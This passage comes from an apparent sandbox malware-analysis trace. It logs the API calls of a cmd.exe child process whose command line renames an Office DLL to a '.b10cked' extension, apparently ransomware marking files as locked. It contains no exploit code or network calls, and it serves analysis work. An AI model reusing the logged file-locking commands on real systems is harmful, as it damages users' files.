returned 1 [0158.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.865] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef30 | out: lpConsoleScreenBufferInfo=0x20ef30) returned 1 [0158.865] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.866] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.866] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ef54, 
lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ef54*=0x1a) returned 1 [0158.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.866] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.866] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.866] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.866] SetConsoleInputExeNameW () returned 0x1 [0158.866] GetConsoleOutputCP () returned 0x1b5 [0158.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.867] exit (_Code=0) Process: id = "269" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21967 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21968 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21969 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21970 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 21971 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21972 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21973 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21974 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21975 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21976 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21977 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21978 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21979 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21980 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 21981 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 21982 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21983 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21984 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21985 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21986 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21987 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21988 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21989 start_va = 0x773e0000 end_va = 
0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21990 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21991 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 21992 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21993 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21994 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21995 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21996 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21997 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21998 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 21999 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 22000 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" 
filename = "" Thread: id = 332 os_tid = 0x320 [0159.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fbe4 | out: lpSystemTimeAsFileTime=0x24fbe4*(dwLowDateTime=0x98bb1860, dwHighDateTime=0x1d440a9)) [0159.050] GetCurrentProcessId () returned 0xf48 [0159.050] GetCurrentThreadId () returned 0x320 [0159.050] GetTickCount () returned 0x30a2d [0159.050] QueryPerformanceCounter (in: lpPerformanceCount=0x24fbdc | out: lpPerformanceCount=0x24fbdc*=21583880855) returned 1 [0159.050] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0159.050] __set_app_type (_Type=0x1) [0159.050] __p__fmode () returned 0x76b331f4 [0159.050] __p__commode () returned 0x76b331fc [0159.050] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0159.050] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0159.051] GetCurrentThreadId () returned 0x320 [0159.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x320) returned 0x38 [0159.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0159.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fb74 | out: phkResult=0x24fb74*=0x0) returned 0x2 [0159.051] VirtualQuery (in: lpAddress=0x24fbab, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x150000, 
lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.051] GetConsoleOutputCP () returned 0x1b5 [0159.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.051] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.052] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0159.053] GetEnvironmentStringsW () returned 0x3f0210* [0159.053] FreeEnvironmentStringsW (penv=0x3f0210) 
returned 1 [0159.053] GetEnvironmentStringsW () returned 0x3f0210* [0159.053] FreeEnvironmentStringsW (penv=0x3f0210) returned 1 [0159.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eae4 | out: phkResult=0x24eae4*=0x40) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0xa0, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x0, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x1000) 
returned 0x2 [0159.054] RegCloseKey (hKey=0x40) returned 0x0 [0159.054] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eae4 | out: phkResult=0x24eae4*=0x40) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x0, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegCloseKey (hKey=0x40) returned 0x0 [0159.054] 
time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0159.054] srand (_Seed=0x5b886381) [0159.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" [0159.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" [0159.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.055] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0159.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0159.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0159.055] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0159.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0159.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0159.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0159.055] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0159.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0159.055] GetEnvironmentStringsW () returned 0x3f2360* [0159.055] FreeEnvironmentStringsW (penv=0x3f2360) returned 1 [0159.055] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.055] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.055] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0159.055] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0159.055] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0159.055] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0159.056] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0159.056] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0159.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f8b0, lpFilePart=0x24f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f8ac*="Desktop") returned 0x18 [0159.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: hFindFile=0x3f09f0) returned 1 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: 
hFindFile=0x3f09f0) returned 1 [0159.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f62c | out: lpFindFileData=0x24f62c) returned 0x3f09f0 [0159.056] FindClose (in: hFindFile=0x3f09f0 | out: hFindFile=0x3f09f0) returned 1 [0159.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0159.057] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0159.057] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0159.057] GetEnvironmentStringsW () returned 0x3f0210* [0159.057] FreeEnvironmentStringsW (penv=0x3f0210) returned 1 [0159.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0159.057] GetConsoleOutputCP () returned 0x1b5 [0159.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.057] GetUserDefaultLCID () returned 0x409 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="0") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="0") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f9f0, cchData=128 | out: lpLCData="1") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0159.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0159.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.059] GetConsoleTitleW (in: lpConsoleTitle=0x3e0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0159.059] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.059] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0159.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0159.060] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0159.060] _wcsicmp (_String1="move", _String2=")") returned 68 [0159.061] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0159.061] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0159.061] _wcsicmp (_String1="IF", _String2="move") returned -4 [0159.061] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0159.061] _wcsicmp (_String1="REM", _String2="move") returned 5 [0159.061] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0159.064] GetConsoleTitleW (in: lpConsoleTitle=0x24f6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0159.065] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0159.065] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0159.065] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0159.065] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0159.065] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="CD") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0159.065] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="REN") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0159.066] _wcsicmp (_String1="move", _String2="SET") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0159.066] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0159.066] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="MD") returned 11 [0159.066] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0159.066] _wcsicmp (_String1="move", _String2="RD") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0159.066] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0159.066] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0159.066] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0159.066] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0159.066] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0159.066] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0159.066] _wcsicmp (_String1="move", _String2="VER") returned -9 